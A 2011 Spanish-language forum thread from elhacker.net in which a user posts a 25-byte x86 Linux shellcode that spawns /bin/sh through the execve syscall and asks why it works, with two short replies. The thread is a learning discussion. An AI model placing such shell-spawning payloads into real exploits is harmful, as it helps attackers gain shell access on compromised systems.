Foro de elhacker.net

Programación => ASM => Mensaje iniciado por: Died en 8 Julio 2011, 18:26 pm


Título: Esta shellcode funcioan realmente? :P
Publicado por: Died en 8 Julio 2011, 18:26 pm
Al hacer mi tipica shellcode de 25 bytes se me olvido una orden y aparte de ahorrarme un byte consegui que arrancase... :P
La subo para ver si realmente funciona como shellcode :D porque es una cosa rarisima.
Alguien me puede explicar como funciona? :D

Código
  1. BITS 32
  2.  
  3. xor eax, eax
  4. push eax
  5. push "//sh"
  6. push "/bin"
  7. mov ebx, esp
  8. push eax
  9. mov edx, esp
  10. mov ecx, esp
  11. mov al, 11
  12. int 0x80
  13.  

Título: Re: Esta shellcode funcioan realmente? :P
Publicado por: _Enko en 8 Julio 2011, 19:20 pm
tan solo es parte de una rutina que llama a un system call de linux, el  sys_execve.

 

Título: Re: Esta shellcode funcioan realmente? :P
Publicado por: Died en 10 Julio 2011, 23:36 pm
Eso lo sé perfectamente :D Lo que no sé es por qué arranca el /bin/bash, vamos, que por qué arranca algo...


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines